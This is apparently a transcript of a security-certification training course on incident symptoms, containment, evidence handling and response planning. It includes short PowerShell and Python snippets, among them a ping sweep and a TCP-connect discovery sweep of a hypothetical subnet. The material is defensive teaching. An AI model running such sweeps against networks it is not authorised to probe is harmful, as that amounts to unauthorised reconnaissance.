detects anomalies and logs them or notifies administrators, but it doesn't do anything to stop them, whereas an
intrusion prevention system does take steps to prevent suspicious activity from continuing.
Now naturally, IDSs and IPSs need to be configured or "trained over time" to determine what is suspicious.
Now a packet sniffer such as the free Wireshark tool or even the Linux and UNIX TCP dump command can be
used to capture network traffic. So we can see what's going on whether it's a wired network or wireless to see if
there are any abnormalities. Of course, there are ways to automate that so we don't have to do it and look for
anomalies manually.
One great symptom of a problem on a network is bandwidth consumption. Now this might be happening for
good reasons. There might be numerous streaming applications running that should be running or people might
be listening to Internet music or news at work when they should not be. Also large downloads...if an IT
administrator is downloading a DVD ISO image or Windows updates, that kind of stuff can take a lot of
bandwidth. Now, depending on your equipment and your network environment, you might be able to throttle and
control what type of bandwidth is available for certain applications including downloading Windows updates
and streaming apps.
An infected host on the network could also be used for sending unsolicited spam e-mail to many e-mail
addresses elsewhere, or there could be abnormal peer-to-peer communications over the network. This might also
be indicative of a worm type of malware that self-propagates over the network between vulnerable hosts. So
that would show up as bandwidth consumption on your network if your hosts are infected and being used that
way. In the same sense, if a DDoS (distributed denial of service) attack is being executed because machines
on your network are compromised and are actually carrying out the attack, that again will show up as
bandwidth consumption. So, like everything, we have to remember that a slowdown in network
performance could be a result of the network being used properly or improperly.
Beaconing is used by some network topologies such as token ring where stations will beacon when they don't
receive a transmission from their upstream neighbor. Now, at the same time, beaconing can be used in other
ways as a heartbeat, for example, between cluster nodes. It's used to detect when a cluster member is down
because we haven't received a heartbeat packet from it recently. So absence of our heartbeat could indicate a
problem – in this case, with a network link or a cluster node.
So network usage baselines then establish what is normal. And what you might even do is use a packet
capturing tool to capture traffic during normal business hours over time, perhaps a week and then calculate
statistics for the normal network load, number of packets in and out, the type of traffic on the wire, and so on.
So this then allows for easy identification of abnormal activity like unusual peer-to-peer communication,
which could be indicative of a worm propagating itself over the network or we might have large volumes of
traffic to or from a specific host or subnet or VLAN. That could be suspicious if we don't normally see that on
the network.
And also, we might want to make sure we have alerts in place to allow technicians to be notified when these
things are happening. Now that might be done within your operating system or with an intrusion detection or
prevention system. Then there's the issue of rogue network devices – devices that should not be on the
network. Now we can control what devices and users can get on the network in the first place – whether it's
wired or wireless – using IEEE 802.1X compliant devices like VPN appliances or Ethernet switches or
wireless access points.
So, if they conform to IEEE 802.1X, we might limit their access to the network by using a centralized
RADIUS authentication server. Now, at the same time even for the most basic Wi-Fi environment, MAC
filtering is something that we could do to limit which devices can connect. Now, of course, it's very easy to
spoof a MAC address with freely available tools, but MAC filtering will keep the casual people from trying to
get connected to our Wi-Fi network. Certainly Wi-Fi MAC filtering shouldn't be the only thing you do to
secure a wireless network. But, with defense in depth, it's always a combination of techniques.
At the same time, we don't want to have rogue DHCP servers. In the Windows Active Directory world, there's
this concept of DHCP server authorization where, when a new DHCP server is brought online, it needs to be
authorized in Active Directory before it's actually active on the network. Now that doesn't stop a malicious
user from firing up a Windows host if they can get on the network in the first place and firing up a rogue
DHCP server or rogue access point. Then there's the issue of ARP cache poisoning where an attacker
essentially will fool all the machines on the network by giving them the MAC address of their malicious
station as the router.
So basically all traffic is funneled through the attacker's system and they get to see everything that way. Now
what should we be doing, at least on an ongoing periodic basis, to see if we have issues on the network,
besides running intrusion detection and prevention systems and periodically capturing network traffic? Well,
you might also run network scans and sweeps to discover and fingerprint network devices, for example, to
discover if new devices are on the network that were not there before and should not be.
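A very basic sketch of such a sweep, assuming a hypothetical 192.168.1.0/24 subnet – real environments would
use a proper discovery or fingerprinting tool, but this shows the idea from PowerShell:

# Ping sweep of a /24 to spot devices that respond but aren't in our inventory
1..254 | ForEach-Object {
    $ip = "192.168.1.$_"
    if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { $ip }
}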
Now also, when a network card is put into promiscuous mode when traffic is being captured on the network,
this can actually be detected. So you should make sure you have a solution that can detect this so that if we've
got a malicious user capturing network traffic, it can send an alert to us. Also we might want to track for
abnormal connections from a network device to other devices. For example, it's not normal perhaps on our
network to be probing for TCP port 22 from one host against many others. This could be indicative of some
kind of reconnaissance by a malicious user looking for SSH daemons running on devices.
So this can be configured. Then, in some cases within your operating system software, you can generate alerts
or you might have a third-party tool, or again it could be part of your intrusion detection and prevention
system to trigger an alarm if too many of these SSH probes, for instance, occur in a short period of time. Now
bear in mind, we have to determine whether it's abnormal or not to have many failed connections such as when
probing ports on machines or failed log in attempts. If you've established a normal usage baseline, it's going to
be pretty easy over time to detect what's abnormal.
[Topic title: Application Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll
talk about application symptoms and response actions.
An application usage baseline establishes what is normal for that application's usage whether it's on a single
server, multiple servers, or even its effect on the network. Once we've determined what's normal for a specific
application, then we can easily detect anomalous activity. In some cases, applications spawn other background
processes. And this could be legitimately a part of the app or it could be a result of malware being triggered in
the background.
In some cases, Failover Clustering can be used to deal with application unavailability. Failover Clustering
means we've got two or more servers working together to offer the same service. And, if one server fails, the
other server or servers can pick up the slack. For Failover Clustering to be effective, all of the nodes in the
cluster need to be using the same shared storage so that they have the same up-to-date data.
User account activity – whether it's the creation of user accounts, modification, deletion, or usage – should be
audited. Of course, we're going to have regular end user accounts for users to authenticate and access network
resources. But some applications have background services that need a specific account to run. Now we should
follow the principle of least privilege when building these service accounts to only grant the privileges
required and nothing more.
But some operating systems like Windows will allow the creation of a managed service account. This is a
secure practice because a managed service account can automatically change its password based on the domain
password change interval, whereas just building a dummy user account for the service requires administrators
to change the password for that account periodically – hopefully – rather than using a password that never
changes for the service account.
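A sketch of creating such an account in PowerShell – the account name, DNS host name, and server group here
are hypothetical, and this assumes the ActiveDirectory module plus an existing KDS root key in the domain:

# Create a group managed service account whose password rotates automatically
New-ADServiceAccount -Name 'svcLobApp' -DNSHostName 'svcLobApp.fakedomain.local' `
    -PrincipalsAllowedToRetrieveManagedPassword 'LobAppServers'
# On the application server, install and verify the account
Install-ADServiceAccount -Identity 'svcLobApp'
Test-ADServiceAccount -Identity 'svcLobApp'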
Malicious users might also build user accounts that look benign. It might be a normal looking user name that
doesn't stand out. And, in fact, it might be used by the malicious user as a back door. And it might even have
elevated privileges. So you might not notice this when you're just looking at user accounts especially in a large
environment with thousands of them. But, if you're auditing this, you might notice that it's strange that at three
o'clock in the morning in your timezone a new user account was created because that might not be normal.
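A hedged sketch of that kind of audit review in PowerShell – event ID 4720 is Windows' "a user account was
created" event, and the number of events pulled back here is arbitrary:

# Look for recent user-account-creation events in the Security log
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720 } -MaxEvents 25 |
    Select-Object TimeCreated, Message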
Applications should be thoroughly tested during development and testing phases for how they behave when
they receive unexpected input because that could result in unexpected output. Fuzz testing throws lots of
random data at an app that it might not expect, to observe its behavior and to make sure it doesn't crash, reveal
sensitive information, and so on. So sometimes specially crafted input in the form of web site forms with
certain data within fields, or certain network packets sent to an app, can cause it to reveal certain data that it should not
otherwise.
So private data might be transmitted to a third party unintentionally. Or, in the case of a
ransomware infection, the host might periodically reach out over the Internet and contact a command and
control center where it receives instructions from a malicious user on how to proceed with encryption.
Outbound firewall rules can also be very helpful. Everyone is concerned about inbound firewall rules and
certainly they're relevant. But also at the host level and network level, outbound firewall rules should track
anomalous activity.
Is it normal that we've got our hosts contacting a certain part of the world, which could be a command and
control center location for a hacker's server to receive instructions? Application service interruptions can also
take the form of denial of service or DoS attacks. A DoS attack essentially renders a system unusable for
legitimate uses. It could be as simple as making a machine crash or it could be flooding a machine with
network traffic such that legitimate users can't even get in.
Now what do we do about that? You know, if we've got a web server, we're not going to block port 80 because
then legitimate users can't get into it. So there are many security solutions even in the form of hardware
appliances that will look for irregular traffic flows such as a lot of traffic coming from one host or a certain
network within a short period of time. And simply block those hosts from communicating with the application,
for example, a web app on port 80.
Memory overflows are also called buffer overflows. So what can happen is a malicious user can gain
elevated privileges due to the fact that software might not be properly checking what's being fed into it. For
instance, a web form with a field where a user puts in a lot of extra data that isn't being validated server side
could result in elevated privileges when that's sent back to the server or it could even corrupt memory in the
application and freeze the application or even cause the operating system to hang.
Now we're not going to run around each and every host and check all of these things, instead we would use
things like host-based intrusion detection systems or host-based intrusion prevention systems. There are also
network counterparts that would be relevant if our application is distributed or has a lot to do with network
traffic. Now an intrusion detection system differs from a prevention system in that the prevention system
can not only detect, log, and alert about suspicious activity, but can also take steps to
prevent it from continuing.
Now you might have to configure it specifically in your environment for your specific application or, over
time, depending on the solution, it can learn what's normal and what's suspicious and automatically make a
decision by itself.
[Topic title: Incident Containment. The presenter is Dan Lachance.] In this video, I'll discuss incident
containment.
So, when something negative happens, what is the incident response plan, what roles do people have, and what
tasks should they perform to contain an incident? So we're talking about stopping some kind of a malicious
attack where we can resume business operations as quickly as possible and limit damage to sensitive IT
systems and data.
An intrusion prevention system or IPS can be used at the host level or at the network level. Either way, an
intrusion prevention system will detect anomalous activity. Now that can only happen if it knows what normal
activity is for usage of an application or usage of the network. And we can configure it for our specific usage
in our environment, which is usually what is required. But an intrusion prevention system can not only detect,
log, and alert administrators about issues; it can also be configured to take steps to prevent an incident from
continuing, such as blocking firewall ports or shutting down certain services.
[The four Containment techniques are Segmentation, Isolation, Removal, and Reverse
engineering.] Containment techniques include things such as segmentation where we might isolate a machine
or an entire network from the rest of the network, for example, if we detect a malware infection. Now part of
the incident response plan might dictate that a network technician unplugs a switch from a master high-level
switch in the hierarchy to prevent the spread of a worm. There's also the removal of problems, such as the
eradication of malware on a machine, perhaps by booting through alternative means. Often you can't
completely and entirely cleanse a machine of a malware infection without booting through alternative means
because sometimes operating system files themselves are infected and spawned during startup.
In some cases, reverse engineering might also be used for incident containment to take a look at, for instance,
what a piece of malware did. So we can learn more about it to prevent future infections or to build effective
antimalware scanning tools. When containing incidents, we need to ensure that the attack is properly contained
and ideally stopped in its tracks. So we could unplug malware infected devices or networks. We could block
wireless device connectivity, for example, by jamming transmissions or using a Faraday cage or bag. We could
also remotely wipe mobile devices that are lost or stolen to prevent data loss that is sensitive getting into the
hands of unauthorized users.
If your environment is using PKI – public key infrastructure – certificates for authentication to services, then
you could revoke the PKI certificate, for example, for a user account that we know is breached or if there's a
PKI certificate tied to a smartphone that's been lost or stolen. We can also in addition to wiping the device,
revoke the PKI certificate. Revoking a PKI certificate is similar to revoking a driver's license. It's no longer
valid and cannot be used. So this would prevent connectivity to services requiring PKI certificate
authentication.
We could also take servers that are compromised offline immediately. Now we need to have a plan in place
ahead of time so this is done properly and that we have some other way of continuing business operations such
as a failover solution being in place if we have to take a server offline. In some cases, we also need to make
sure that we preserve the integrity of evidence that might be used in the court of law. So it needs to be
admissible.
We want to make sure that evidence isn't tainted during containment. So we might generate unique hashes of
original data and then work only with copies or backups of that data. So we always have the original data at the
time it was seized in its original form.
The chain of custody needs to be followed, and we need documentation that shows how the chain
of custody was followed, such as file system hashing and steps taken to prevent evidence tampering. We should
be able to track where evidence was, how it was contained, where it was stored, how it was moved, and so on.
And this might be required for evidence admissibility.
The removal and restoration of affected IT systems and their data is what we're concerned with here. So all
steps that we take when we eradicate a problem and recover systems and data need to be documented. This
should also be planned ahead of time in a disaster recovery plan. There should be continuous improvement of
security controls to ensure that they are effective in protecting IT systems and data. As we know, the threat
landscape is always changing as related to IT systems. So, in response to that, we've got to continuously keep
verifying that our security mechanisms are doing their jobs.
Eradication techniques of things like infections include reconstruction or reimaging of systems, sanitization of
storage media, and secure disposal of equipment even when that equipment reaches end of life. Now let's say,
for example, that our network has been infected with ransomware. Now ransomware infections often come in
the form of some kind of phishing attack where users unwittingly open a file attachment from an e-mail
message or click on a link and then the ransomware is unleashed.
Now the ransomware will seek to encrypt files that the infected system has write access to. And, of course, if
that's an administrative station, that could be a lot of write access. So a lot of data could be encrypted. And the
malicious user will then, of course, require some kind of a ransom payment, usually in the form of Bitcoin,
before a decryption key – if it's even provided at all – is handed over.
Now, in the case of ransomware, one way to mitigate that is to restore systems. And, for that to happen,
technicians need to be aware of the incident response plan and their role in it, what they should do, and the
sequence of steps they should take. So reinstallation of systems could be manual or you might use an
imaging solution to reapply images.
But, when you restore a system, you've got to make sure you've got the latest patches, you should also – of
course – immediately scan for malware, and you might even restore, or in some cases, reissue PKI certificates
if PKI certificate authentication is being used. Now still talking about the ransomware example, what about
data? It's one thing to reimage systems and get them up and running. But what about data? Well, ideally we
want to always have an offline backup location elsewhere. And that might even be in the cloud.
And we need to ensure that backups are clean. So, if we've got a ransomware infection on an administrative
station and that administrative station also has write access to the backup location – for instance – in the cloud,
then that could also mean that our cloud backup is infected with ransomware and encrypted and we can't do
anything about it. So we want to make sure our backups are clean, stored offline. And, if we have to restore it,
then we should certainly scan it for malware infections. And then, of course, when we have any type of issue,
we always need to monitor our solution to ensure that the problem has been eradicated.
So we always need to have offline backups of important data because in the case of ransomware which is
absolutely rampant these days, it won't be able to touch our offline backups. Now, in some cases, unfortunately
some people think that it might be more sensible to pay the ransom because it appears to be cheaper than
paying the IT team to do an entire system and data recovery. Bear in mind, paying a ransom never guarantees –
in this case – that you'll get a decryption key.
With sanitization, we can overwrite media with multiple passes of random data. And there are specific tools
that may have to be used depending on laws or regulations that apply to the organization. Degaussing is a
technique whereby a strong magnetic field is applied to magnetic storage media essentially to erase it. There's
always the option of remotely wiping mobile devices that are lost and stolen to prevent sensitive apps or data
from being used by unauthorized users.
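As one small, hedged example on the Windows side – this only overwrites deallocated space on a volume and is
not a substitute for whatever sanitization standard your organization must follow – the built-in cipher tool can
run multiple overwrite passes:

# Overwrite free space on drive D: with passes of zeros, ones, and random data
cipher /w:D: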
There's always the factory reset of equipment to remove the configuration. This is going to be important if our
equipment has reached end of life and we might be donating it to charities or schools or selling it so it can be
used by someone else. I've seen cases where a router, for instance, purchased from eBay still has the
configuration for the network on which it was running in the past.
Sanitization completion forms are normally required to be filled out properly and submitted after, before, or
even during – in some cases – sanitization to ensure that we have a record, a paper trail essentially of
sanitization efforts. Secure disposal is also very important when it comes to things like the physical destruction
of media. Maybe that's what's required, for example, for a military institution whereby we might actually shred
storage media physically, like hard disk platters or USB thumb drives, or maybe they're burned or maybe holes
are even drilled into disk platters rendering them unusable.
In this video, you will identify positive outcomes that have been learned from incidents.
Objectives
[Topic title: Lessons Learned. The presenter is Dan Lachance.] As people, we like to think that we learn from
past mistakes. The same is true with organizations, and their IT systems, and data. In this video, we'll talk
about lessons learned. Lessons learned rely on incident documentation so that we can prevent similar
occurrences in the future. Or if we can't prevent it, we can respond to it in a better manner. So essentially we
are learning from past events. Now one way that this works well is by holding a meeting about a specific
negative incident after it occurred. But what types of things would be discussed in this type of post-incident
meeting?
Well, one of the things we'd want to do is talk about who or what discovered the incident. We want to make
sure that this can be done in the early stages, for example, with malware infections. We can also determine what
caused the incident and what the affected scope was. So if it's ransomware, for example, that might have been
caused by a user opening a file attachment that they shouldn't have opened. So user awareness and training,
once again, becomes an overall important theme. We would then look at whether or not the incident response
that took place was effective: were we able to contain the incident, was the incident actually eradicated, what
steps were taken based on our incident response plan, and was each step effective?
Are the current security controls effective or not – an ineffective control may be why we ended up with a
negative incident in the first place. Not everything is preventable. Bad things simply just happen. But
sometimes we can tweak or
make changes to security controls to prevent things from happening. Lessons learned is really based on
documentation. And this needs to be a part of all incident responses, where we take a look at symptoms, the
root cause of the problem, the scope of what was affected by the incident, and each and every action taken. In
some cases, we might also use date and time stamps for this and also track who performed exactly which steps.
And certainly in the case of forensic evidence gathering for chain of custody purposes, this is going to be
especially relevant. In this video, we discussed lessons learned.
After completing this video, you will be able to recognize the impact of threats and design an incident response
plan.
Objectives
Exercise Overview
[Topic title: Exercise: Identify and Respond to Threats. The presenter is Dan Lachance.] In this exercise,
you'll start by listing examples of personally identifiable information. Following that, you'll describe the chain
of custody as well as service-level agreements. Finally, you'll then list host symptoms that prompt incident
response. Now pause the video and consider each of these four bulleted points carefully and then come back to
get some solutions.
Solution
Personally identifiable information or PII examples include bank account information, a person's driver's
license number, an e-mail address, a date of birth, a full name, and many other items. The chain of
custody ensures evidence integrity. Documentation is required so that we can track how evidence was
gathered, how it was stored, and how it was transported. We have to have all of this documented in order for data to
be considered admissible in a court of law. And, of course, the detailed rules will vary from region to region.
A service-level agreement or an SLA is a contractual document between a service provider and the service
consumer. It describes the expected levels of an IT service. In the IT world, with SLAs, that means looking at
things such as uptime that is promised by a provider for a service, and response time, which could include how
quickly something responds in terms of a technical IT solution as well as how long it takes for tech support to
respond to an issue. There are then consequences that are also listed if this contract's details are not honored.
And often that comes in the form of credits to the consumer for IT services.
Host symptoms that can prompt incident response include performance degradation, whether that is due to
most of the memory being consumed, running out of disk storage space, or CPU utilization peaking.
Often, if there are unusual processes running in the background that you're not familiar with, it could be
indicative that there is some kind of an infection or some kind of a problem on the machine or maybe software
that was installed without the user's consent.
Also, system settings changes that weren't made by the user or by the system owner can be suspicious. Think
of things like the web browser default page being changed, antivirus updates being disabled when they were
previously enabled, remote desktop being turned on on a Windows computer even though it was disabled
previously, or firewall rules that look more relaxed and less strict than they were before. But bear in mind,
these could be changes made by a system administrator, for example, through Group Policy in a Windows
environment. However, they still warrant our attention.
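As a supplementary illustration of the performance symptoms just described, here is a minimal Python sketch (not from the video) that checks a host against some illustrative thresholds. It assumes the third-party psutil library is installed, and the threshold values are arbitrary examples rather than recommended baselines.

import psutil  # third-party library: pip install psutil

# Illustrative thresholds only; real baselines vary by host and workload.
CPU_MAX, MEM_MAX, DISK_MAX = 90.0, 90.0, 85.0

def check_host_symptoms():
    """Return a list of performance symptoms that might prompt a closer look."""
    symptoms = []
    cpu = psutil.cpu_percent(interval=1)      # sample CPU usage over one second
    mem = psutil.virtual_memory().percent     # percentage of RAM in use
    disk = psutil.disk_usage("/").percent     # percentage of the root volume used
    if cpu > CPU_MAX:
        symptoms.append(f"CPU utilization peaked at {cpu}%")
    if mem > MEM_MAX:
        symptoms.append(f"Memory usage at {mem}%")
    if disk > DISK_MAX:
        symptoms.append(f"Disk usage at {disk}%")
    return symptoms

if __name__ == "__main__":
    for s in check_host_symptoms():
        print("Possible symptom:", s)

In practice, monitoring agents and SIEM tooling perform checks like this continuously and compare against a learned baseline rather than fixed numbers.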
Table of Contents
In this video, you will learn how to use OEM documentation to reverse engineer products.
Objectives
[Topic title: OEM Documentation. The presenter is Dan Lachance.] In this video, I'll discuss OEM
documentation. OEM stands for original equipment manufacturer. OEMs might make a hardware component,
such as one used in a server, or a finished product such as software; an OEM could also define a proprietary
file format, such as a PDF, or produce an operating system like Linux, and so on. So OEMs are equipment
manufacturers not just in the physical sense but also in the software sense.
Now we can start with the completed product or process and work backward through the end result to reverse
engineer some kind of an OEM solution. The purpose of reverse engineering is to reveal steps that were taken
to arrive at a result. And often, this is done to deconstruct some problem that we've encountered or to take
something apart to ensure it's been built in a secure manner.
However, OEM documentation can also be put to malicious use. Because the more that's known about some
kind of a proprietary security solution, the more vulnerable it could become. So think, for example, of an alarm
system for a facility. The more that a malicious person knows about the inner workings of that alarm system,
the more likely that he or she would be able to perhaps circumvent it. And the same type of logic applies to
hardware and software. The more malicious users know about our network – for instance, through network
reconnaissance they may have learned what type of tools we're using and what firewall and firmware revisions
we're running – the more easily they'll be able to pinpoint where vulnerabilities might exist.
Proper use means that the more that's known about attacks and malware, the more effective mitigating security
controls can be. And again it all boils down to information being power. Reverse engineering can be done in an
isolated controlled environment. For example, software developers might reverse engineer malware to
determine how it behaves with the purpose of trying to prevent it from happening in the future and to eradicate
current instances of that malware. For software, of course, we would have to create backups and snapshots
prior to attempting reverse engineering.
Reverse engineering could also mean decompiling software or enabling detailed monitoring on software
solutions or even hardware solutions where we observe the behavior as we try different things against it. Of
course, we would have to create and update documentation as we proceed through the reverse engineering.
Now again, often malicious users will perform network scans and try to deduce through reverse engineering
what is being done on a network and how things are configured. In this video, we discussed OEM
documentation.
[Topic title: Network Documentation. The presenter is Dan Lachance.] In this video, I'll talk about network
documentation. Network documentation can be created either manually or we could have an automated process
such as software that scans the network and discovers devices and starts to populate information about what it
discovers. Documentation for the network should be supplied to new IT employees so that they have
familiarity with the network infrastructure and how it's being configured, what things are called, what IP
addressing is in use, and so on.
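As a supplementary sketch of the kind of automated discovery just mentioned (not from the video), the following Python example does a very crude sweep of a hypothetical subnet by attempting TCP connections on a few common ports. Real discovery tools use techniques such as ICMP, ARP, and SNMP and gather far richer detail; the subnet and ports here are illustrative assumptions, and the sweep is sequential and slow by design.

import socket
import ipaddress

SUBNET = ipaddress.ip_network("192.168.1.0/24")  # hypothetical subnet
PROBE_PORTS = (22, 80, 443)                      # crude liveness check only

def discover(subnet):
    """Very rough discovery sweep: record hosts answering on common TCP ports."""
    inventory = {}
    for host in subnet.hosts():
        for port in PROBE_PORTS:
            try:
                with socket.create_connection((str(host), port), timeout=0.2):
                    inventory.setdefault(str(host), []).append(port)
            except OSError:
                pass  # closed, filtered, or host not present
    return inventory

if __name__ == "__main__":
    for ip, ports in discover(SUBNET).items():
        print(ip, "responded on ports", ports)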
Network documentation might also be required when a security audit is being conducted. And it certainly can
be helpful when troubleshooting network performance. Network documentation can also be based on
geography where it identifies different network sites and the site connectivity linking those locations – so the
type of network link, the speed, any redundant links that might be put in place for fault tolerance as well as
internet connections along with their speeds. Now there might also be dedicated leased lines that link different
sites together, which bypass the internet altogether.
Of course, on the network, we're going to have a number of different devices like servers – both physical and
virtual – routers, switches, things like VPN appliances normally placed in a DMZ – a demilitarized zone,
firewall appliances, wireless routers. Due to the nature of having a large network potentially with a lot of users,
a lot of stations, and a lot of these types of network devices, we can see clearly that there is a need for network
documentation. The thing is that documentation has to be kept up to date. So really maintaining this
documentation is an ongoing task.
The configuration of all of these network devices also needs to be documented. Now there are some software
suites that will not only scan the network and discover what's out there but also discover some of the
configuration settings for devices or allow you to input it manually so everything is stored in one place for
your documentation.
Every network device should also have a change log. Larger companies typically have a formal change
management process in place, so that before a change occurs, certain documentation must be filled in and
approval must be received before proceeding with the change. And so there should be a history of what's been
changed, by whom, when, and on which device.
The placement of all of these network devices on the network is paramount. So, when we talk about network
documentation, sometimes a visual network map can also be very useful. Network documentation must also
include the protocols in use, such as the network protocols IPv4 and IPv6. We should also have
documentation that tells us whether we're using routing protocols like RIP, OSPF, or BGP. The specific
network addressing that we're using – whether it's assigned manually or through DHCP – must also be
documented, along with the specific use of network address ranges.
Now, what that means for instance is that maybe within an address range, addresses 1 to 100 are for user
devices. But maybe 101 to 110 are for network printers. And, maybe beyond that, the rest is for other network
infrastructure equipment like routers, switches, and servers. And of course, authentication requirements are part
of network documentation, what is needed to gain access to the network and resources on it.
So, for instance, is single-factor authentication used or is multi-factor authentication used? In some cases,
both could be, where signing in with multi-factor authentication gains you access to categories of data that you
wouldn't see with single-factor authentication. Network documentation will also stipulate the naming
conventions that are in use for consistency reasons, things like server names, names for users, and names for
different types of groups. Group memberships and role-based access control should also
be part of the network documentation. This is especially important, again, when third party consultants are
coming in for troubleshooting or to perform an audit. And again it's very important for new IT employees to
get familiar with the network. In this video, we discussed network documentation.
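As a brief supplementary note on the addressing convention mentioned above (host numbers 1 to 100 for user devices, 101 to 110 for network printers, and the remainder for other infrastructure), a convention like that can be captured in a small script so the documentation and the live network can be cross-checked. This Python sketch is illustrative only, and the subnet is a hypothetical example.

import ipaddress

# Hypothetical convention from the narration: within 192.168.10.0/24,
# host numbers 1-100 are user devices, 101-110 are printers, and the
# rest is other infrastructure (routers, switches, servers).
NETWORK = ipaddress.ip_network("192.168.10.0/24")

def classify(address):
    """Map an IP address to its documented role based on its host number."""
    ip = ipaddress.ip_address(address)
    if ip not in NETWORK:
        return "outside documented range"
    host_number = int(ip) - int(NETWORK.network_address)
    if 1 <= host_number <= 100:
        return "user device"
    if 101 <= host_number <= 110:
        return "network printer"
    return "network infrastructure"

if __name__ == "__main__":
    for addr in ("192.168.10.42", "192.168.10.105", "192.168.10.200"):
        print(addr, "->", classify(addr))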
After completing this video, you will be able to recognize the importance of maintaining incident response
plans.
Objectives
[Topic title: Incident Response Plan/Call List. The presenter is Dan Lachance.] When it comes to dealing with
security breaches, preparation is everything. In this video, we'll talk about an incident response plan. This type
of plan is often overlooked because essentially what we're doing with it is planning for failure: we are
anticipating things that will fail and deciding what our response to those failures will be. The idea is that
we want a structured approach to security breach management where everyone knows which role they
play in the overall plan. We want to make sure that damage to IT systems and data is minimized while at
the same time being able to resume normal business operations as quickly and efficiently as possible.
The effects of inadequate incident response plans include things such as financial loss, reputation loss, the loss
of a business partnership or contract. The incident response plan needs to be in effect before breaches occur.
And ideally, there will have been time to conduct at least one or more drills or tabletop exercises where the
involved parties know their role and know what the sequence of steps is to deal with these incidents. So
stakeholders must know their role. And there needs to be training and not just for IT technicians.
We want to make sure that there's awareness among the general user population on the network because they
might be the ones that notify us that there is an incident that is about to occur, is occurring, or already has
occurred. There needs to be an annual review of the incident response plan at a very minimum to keep up with
changing threats. Now bear in mind that we want to make sure that we don't have things like reputation loss or
financial loss. From a PR perspective – public relations – if we don't handle incidents in a meaningful way, it
can reflect badly on the company. And that can degrade shareholder confidence and so on.
So, for example, consider the Nortel bankruptcy in 2009, which followed years of Chinese hackers reportedly
having been in the network; nobody really knows exactly what information was gathered or what was done,
but that kind of breach can contribute to the demise of an organization. Another part of an
incident response plan is a call list. Now the call list of course will allow us to have people that we can contact
in the event of an incident. And we make sure that we know who to contact and in which order.
Data flow diagrams that outline how data gets created and manipulated through IT systems can also be crucial
so that we can minimize downtime for our IT systems. Network diagrams, of course, always help when
troubleshooting with network-based incidents so that we know the placement of servers, routers, switches,
what they're called, what their IP addresses are, and so on. The configuration for logging on our network
devices is also important. Because, for instance, if we've got log forwarding enabled for all of our Linux hosts
to a centralized monitoring system, then we want to make sure that we go to that centralized monitoring system
when we're looking for log events related to those hosts that are forwarding their events to that system.
There should also be step-by-step procedures included within the incident response plan related to things like
reporting incidents, managing incidents, and the preservation of evidence, following the chain of custody.
There should also be a listing of escalation triggers, because at some point, if the incident can't be contained or
handled properly, we may have to call upon a third party to deal with it.
The call list contains incident response team contact information. It will include items such as the Chief
Information Officer's contact info, system administrators for various IT systems, legal counsel, law
enforcement, and perhaps even a public relations or PR officer. In this video, we discussed the incident
response plan.
[Topic title: Incident Documentation. The presenter is Dan Lachance.] In this video, I'll discuss incident
documentation. The SANS Institute online has numerous white papers and templates that deal with all things
security, including incident response. An incident response form might deal with things such as the cause of
the incident, how it was discovered, the affected scope, and containment and eradication details as well as
recovery details.
Here, on the sans.org website, [The www.sans.org web site is open. In www.sans.org web site, the Sample
Incident Handling Forms web page is open which includes two sections titled Security Incident Forms and
Intellectual Property Incident Handling Forms which further includes various links. The Security Incident
Forms includes Incident Contact List, Incident Identification, Incident Survey, and Incident Containment links.
The Intellectual Property Incident Handling Forms includes Incident Form Checklist and Incident Contacts
links.] we can see numerous Security Incident Forms related to incident handling such as an Incident Contact
list, Incident Identification, Incident Survey, Incident Containment, and so on. So, for example, if I were to
click on the Incident Identification template, it opens up a new web browser tab and opens up a PDF [The
PDF contains two sections. The first section General Information includes various fields such as Name, Date
and Time Detected, Location Incident Detected From, Phone, and Address. The second section Incident
Summary includes various fields such as Site, Site point of Contact, and Phone.] where I would put in
information such as the incident detector's information, the date and time the incident was
detected, the location, the contact info, of course, of the person that detected it.
So we can use these as a starting point template. They are freely available on the SANS website to start to get
ourselves organized and have a plan in place with proper documentation. External documentation can come in
the form of a service-level agreement or an SLA. Now this is a contractual document between a consumer of a
service and the provider of that service. So, in the case of an incident response provider, we would have an
SLA with them if we were their customer. In that case, we are outsourcing incident response.
So, when we outsource, we might outsource some or all incident response issues to a third party. Now we
might do this because of a lack of time internally to properly handle incidents. We might also have a lack of
skilled expertise to deal with certain issues. Also third parties will perhaps offer 24/7 support and follow-up
support as well. So, if you think about an example such as our internal incident response team being able to
handle incidents maybe related to smartphones or desktops...but what about mainframe systems that are
involved in other locations or what about identity federation problems or public cloud issues?
So those are things that our internal technicians might not be able to handle. So therefore, outsourcing can be a
viable solution. The chain of custody, of course, is always important, and the preservation of evidence
integrity is the number one concern when dealing with external incident response and documentation. After incidents
have occurred, documentation must then be once again updated.
The incident response report will include things such as the cause, how the incident was discovered, the scope,
how the issue was resolved. And ideally through lessons learned, we'll then have some more new information
that we can use to update the existing incident response plan. Because the common theme of a lot of this
documentation for security and security controls and response plans is that it's an ongoing task to keep it up to
date.
So why not take the opportunity, once an incident has already occurred and been dealt with, to learn from it
and update the documentation related to that incident at that point. Another part of post-incident
documentation is the post-incident meeting, for which we could record meeting minutes. And this should
normally happen within a few weeks after the incident. The lessons learned, of course, are ideal for future
prevention, useful for training and updating documentation, and can also be very useful for tabletop and mock
exercises so that all involved parties know exactly what to do when an incident occurs. In this video, we talked
about incident documentation.
During this video, you will learn how to protect the integrity of evidence you have collected.
Objectives
protect the integrity of collected evidence
[Topic title: Chain of Custody Form. The presenter is Dan Lachance.] In this video, I'll discuss the chain of
custody form. Chain of custody preserves the integrity of evidence. It provides rules and procedures that are to
be followed to ensure that we can trust the integrity of evidence. It also deals with evidence gathering – how
the evidence was collected. Evidence storage – where is it stored; where was it moved to, by whom; what
were the dates and times. And also evidence access – who had access to it, was it signed out, was it transferred
between locations, and so on.
This can affect the admissibility in a court of law. Now, of course, laws will vary from region to region around
the world. But the general concept of chain of custody remains the same. With evidence gathering, we have to
think about first responders. They should always be working only from a copy of digital data. Now this can be
done by taking an image or cloning things like hard disks and storage media instead of working on the original.
Working on the original is always a no-no. Write blocking can also be used to prevent changes to data. Write
blocking usually comes in the form of software these days where, for instance, before we image a hard disk to
be used for evidence, we would install write blocking software to ensure that no changes would be made in
that case to that specific device. So examples of gathering evidence would include measures such as immediately
turning off a suspect mobile phone and removing batteries when it's seized.
Now we would do this to ensure that they can't receive signals from elsewhere to destroy evidence or anything
like that. Faraday bags are used essentially as shielding into which we can place communicating devices so
